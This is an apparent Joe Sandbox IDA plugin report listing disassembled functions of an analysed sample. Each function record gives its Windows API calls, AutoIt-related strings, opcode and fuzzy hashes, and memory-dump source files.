Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 26db3617fc4cf156e93f8097434522a85d30bd49bf30b5a2f0856e12001ffe6a
Instruction ID: 74ecaaf3deac55ec0810982d3aaeb6877787e51c9ff40569c8170b0d0103e89a
Opcode Fuzzy Hash: 26db3617fc4cf156e93f8097434522a85d30bd49bf30b5a2f0856e12001ffe6a
Instruction Fuzzy Hash: AD219F32610219BFEF218F94CC46FEA3B79EB88714F114215FA156B1D0D6B5A9509BA0

Function 00994653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00994705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00994713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0099471A

Strings

msctls_updown32, xrefs: 00994684

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 9d603d4fb3dc13482b4c2bedddbb9cfddd1bf8298f798cf3dee4f5589f431d85
Instruction ID: a02a4b04b63be8695d1a58d6be3465d41fc604ed2515d063127e5c550bc00706
Opcode Fuzzy Hash: 9d603d4fb3dc13482b4c2bedddbb9cfddd1bf8298f798cf3dee4f5589f431d85
Instruction Fuzzy Hash: 282162B5605209AFDB11DF68DCD1DB737ADEB8A398B040459F6009B251DB30EC52DA60

Function 009695AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0096961D

Strings

#requireadmin, xrefs: 009695D9
#OnAutoItStartRegister, xrefs: 009695F3
#notrayicon, xrefs: 009695B7

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: f7adc2308134dbffcd24bf7e5e07836ae352d1bee7a9e1d9eb496ce820fd479b
Instruction ID: 072f961ec73296fb64e5b61f37b5d7f1257c312ec19ea840b9e542d37430b27a
Opcode Fuzzy Hash: f7adc2308134dbffcd24bf7e5e07836ae352d1bee7a9e1d9eb496ce820fd479b
Instruction Fuzzy Hash: 012157722056206AC731BB28DC16FBBB3DC9FD1314F14442AF94ADB081EBB5AD45C295

Function 009937B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00993840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00993850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00993876

Strings

Listbox, xrefs: 0099380F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 66d196f2468561f398c240996f00a8830dbfe2d4a5d7bd79855ccdb3152a0980
Instruction ID: 1d6104162be8cbf107f61e0097634698f1528a188502b65c79544f1f2610f579
Opcode Fuzzy Hash: 66d196f2468561f398c240996f00a8830dbfe2d4a5d7bd79855ccdb3152a0980
Instruction Fuzzy Hash: F4219F72614218BBEF218FA9CC85FBB376EEF89754F108125F9059B190C672DC529BA0

Function 009749F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00974A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00974A5C
SetErrorMode.KERNEL32(00000000,?,?,0099CC08), ref: 00974AD0

Strings

%lu, xrefs: 00974A6F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: f2be766f17ebaaa2709a22ecdd269af108444d0d59f836fb9e70c34dc0068b73
Instruction ID: 3f06e3657429b8b0c8912753e568a1070e850927236cf9e2519afa249375568f
Opcode Fuzzy Hash: f2be766f17ebaaa2709a22ecdd269af108444d0d59f836fb9e70c34dc0068b73
Instruction Fuzzy Hash: A5317175A04108AFDB10DF58C885EAA7BF8EF48308F1480A9F909DB253D771ED45CB61

Function 009941EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0099424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00994264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00994271

Strings

msctls_trackbar32, xrefs: 00994226

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 6670d475c556b4d32abf9bc84a80687199e664c3789c4406022ccc4e16f6229d
Instruction ID: 5d627cbc4cfc83dde6b8906654647772182ede0ffdb2d073b21e4acb5a9697be
Opcode Fuzzy Hash: 6670d475c556b4d32abf9bc84a80687199e664c3789c4406022ccc4e16f6229d
Instruction Fuzzy Hash: 14110632244208BEEF215F69CC06FAB3BACEF95B54F110524FA55E20A0D271DC629B20

Function 00962F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00906B57: _wcslen.LIBCMT ref: 00906B6A

Part of subcall function 00962DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00962DC5
Part of subcall function 00962DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00962DD6
Part of subcall function 00962DA7: GetCurrentThreadId.KERNEL32 ref: 00962DDD
Part of subcall function 00962DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00962DE4

GetFocus.USER32 ref: 00962F78

Part of subcall function 00962DEE: GetParent.USER32(00000000), ref: 00962DF9

GetClassNameW.USER32(?,?,00000100), ref: 00962FC3
EnumChildWindows.USER32(?,0096303B), ref: 00962FEB

Strings

%s%d, xrefs: 00962FFF

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: dacbda4bc4e26bb7373fb999ecfa2558d0e96c59ef890e565b22ccc16c59950d
Instruction ID: e54d884672fdb479bd5974dbb529bee7a5dc53235d95d4e7595929d7607ca804
Opcode Fuzzy Hash: dacbda4bc4e26bb7373fb999ecfa2558d0e96c59ef890e565b22ccc16c59950d
Instruction Fuzzy Hash: CE1172B56002056BDF147F74DC95FED376AAFD4304F048076B909AB192DE7099499B60

Function 00995882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009958C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009958EE
DrawMenuBar.USER32(?), ref: 009958FD

Strings

0, xrefs: 0099588F

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 5c0cd2407ae76acbd4d642fd3bab2c32eb37b8b676b3500dd9ad7907c9acd9df
Instruction ID: 3b60c3026c8b43c4048971dd922d90134e2a2b902968c5982cc3148d8674853c
Opcode Fuzzy Hash: 5c0cd2407ae76acbd4d642fd3bab2c32eb37b8b676b3500dd9ad7907c9acd9df
Instruction Fuzzy Hash: 36016171614218EFDF119F15DC44BAFBBB8FB45761F118099F849D6151DB308A84EF21

Function 0095D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0095D3BF
FreeLibrary.KERNEL32 ref: 0095D3E5

Strings

X64, xrefs: 0095D2A8
GetSystemWow64DirectoryW, xrefs: 0095D3B9

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: de904ee9ae91d670a6ca7b83490791bfcf61a692743a86810ca6ef868ddd70c5
Instruction ID: 6d7d06c905f70f2b006da757632d744ae3b80373f2c6159b35ec19acb3c4c6c8
Opcode Fuzzy Hash: de904ee9ae91d670a6ca7b83490791bfcf61a692743a86810ca6ef868ddd70c5
Instruction Fuzzy Hash: 0CF0E5A294BB21DBD731D3164C54AA97358AF10703F54895AFC06E2114E764CD8CCB96

Function 0096007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96462fa37fdba39d42433abcd975f3202b73de436b1e0ffbe8872216b216ce07
Instruction ID: 76d3271233d1730db4b283c8546ee19504d75cc5c2180609b526d6c68392069a
Opcode Fuzzy Hash: 96462fa37fdba39d42433abcd975f3202b73de436b1e0ffbe8872216b216ce07
Instruction Fuzzy Hash: B8C14B75A0020AEFDB14CFA8C894EAEB7B9FF88705F118598E515EB251D731ED41CB90

Function 00933E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00933F0B
__alldvrm.LIBCMT ref: 0093410C
__alldvrm.LIBCMT ref: 0093412E

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction ID: 3c88699dd03596d4738fb01008e8db9b10ff8d63ddecf3916d8608e5ac3fb0c4
Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction Fuzzy Hash: 12A19B72E047869FEB25CF68C8917AEBBF8EF61350F15416DE5859B281C238AD81CF50

Function 0098342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00983459
CoUninitialize.OLE32 ref: 00983463
VariantInit.OLEAUT32(?), ref: 0098346E
VariantClear.OLEAUT32(?), ref: 0098371B

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: fe273bea2a3d24be7c6b2d6e9123045a22331b5f82a035991766d053e5e394fd
Instruction ID: d9f1ee0f154b5e61db0323df1d1f9d641d7237d33e6b40eff04fca7eb0cda35b
Opcode Fuzzy Hash: fe273bea2a3d24be7c6b2d6e9123045a22331b5f82a035991766d053e5e394fd
Instruction Fuzzy Hash: 45A13F756043019FC710EF68C985B6AB7E9FF88724F048859F9899B3A2DB30EE41CB51

Function 00960436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0099FC08,?), ref: 009605F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0099FC08,?), ref: 00960608
CLSIDFromProgID.OLE32(?,?,00000000,0099CC40,000000FF,?,00000000,00000800,00000000,?,0099FC08,?), ref: 0096062D
_memcmp.LIBVCRUNTIME ref: 0096064E

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 5d85ec62f7ca1662023f09b6485c2aa0d87a80d020a1ca72b7b79dd9c1cc5b01
Instruction ID: 3102728bc0ccde8de18526c13e68fa451f78e4502847a35f25e3fa8842a4546c
Opcode Fuzzy Hash: 5d85ec62f7ca1662023f09b6485c2aa0d87a80d020a1ca72b7b79dd9c1cc5b01
Instruction Fuzzy Hash: C881E975A00209EFCB04DF98C984EEEB7B9FF89315F204559F516AB250DB71AE06CB60

Function 00941391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 009414C0

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 862c9087e0cc98dc63a29ce0c967effbc08ce539e9d03e362a6468ef874623fc
Instruction ID: dbcdeacc1a74468c1999e2498adb61343153034e6b799a672379aa514159a473
Opcode Fuzzy Hash: 862c9087e0cc98dc63a29ce0c967effbc08ce539e9d03e362a6468ef874623fc
Instruction Fuzzy Hash: 34415D35A00120ABDB257BBDAC45FBE3AB8EF82370F140625F429D61A2E77488C15661

Function 00996278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0167E888,?), ref: 009962E2
ScreenToClient.USER32(?,?), ref: 00996315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00996382

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 6582788817f2283df524a4c032d235d7a2c3bf366e3ffb2cf32907209397a184
Instruction ID: 042f6b0b5aec68e413579b34e7207261a265ed33bca5ef692987ef5a464e9eea
Opcode Fuzzy Hash: 6582788817f2283df524a4c032d235d7a2c3bf366e3ffb2cf32907209397a184
Instruction Fuzzy Hash: 40514C75A00209EFDF10DF68D881AAE7BB9FF55360F10815AF8259B2A0D730ED81DB50

Function 00981AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00981AFD
WSAGetLastError.WSOCK32 ref: 00981B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00981B8A
WSAGetLastError.WSOCK32 ref: 00981B94

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: f99cb75cd811ccc88446452ef7421cd7660179a1764ebdb593c0b081b448741e
Instruction ID: db8a2dc5918f37208b19c1011e2585aafdf54ae6b562bc856cb73c50f40904be
Opcode Fuzzy Hash: f99cb75cd811ccc88446452ef7421cd7660179a1764ebdb593c0b081b448741e
Instruction Fuzzy Hash: 2041A374600200AFE720AF24C886F6977E9AB84718F548458F95A9F3D2D772ED82CB90

Function 0093B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6874edf1819faf622e0c936fb54ce862b9dce0729345fbb6b574ff70af500ade
Instruction ID: 34326f39454035a22d4bd17699d713ec81e03877e2d83edc4667dbe7b094a0e0
Opcode Fuzzy Hash: 6874edf1819faf622e0c936fb54ce862b9dce0729345fbb6b574ff70af500ade
Instruction Fuzzy Hash: 71411775A00314BFD724AF38CC45B6ABBE9EBC8710F10462AF256DB692D771A9418B80

Function 009756D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00975783
GetLastError.KERNEL32(?,00000000), ref: 009757A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009757CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009757FA

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c3d415a4a2c0be05a965be7909c88c2e43904e179379530e597fd4715ecda224
Instruction ID: cd2e078469fa8d84b64ca25c1cf8fc0e2a89b0ae3d359eba1cc7d19840cfff02
Opcode Fuzzy Hash: c3d415a4a2c0be05a965be7909c88c2e43904e179379530e597fd4715ecda224
Instruction Fuzzy Hash: 39414F35600610DFCB11DF55C444A5DBBE5EF89720B19C488F84A9B3A2CB74FD40DB91

Function 0093D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00926D71,00000000,00000000,009282D9,?,009282D9,?,00000001,00926D71,8BE85006,00000001,009282D9,009282D9), ref: 0093D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0093D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0093D9AB
__freea.LIBCMT ref: 0093D9B4

Part of subcall function 00933820: RtlAllocateHeap.NTDLL(00000000,?,009D1444,?,0091FDF5,?,?,0090A976,00000010,009D1440,009013FC,?,009013C6,?,00901129), ref: 00933852

Memory Dump Source

Source File: 00000000.00000002.2074564631.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true

Associated: 00000000.00000002.2074545292.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.000000000099C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074608943.00000000009C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074666533.00000000009CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074685722.00000000009D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_900000_YJwE2gTm02.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 7d232e506abe22e9ea51b8f80e3cb2db231c82ca4f02ca542ef8ccc46f3ef027
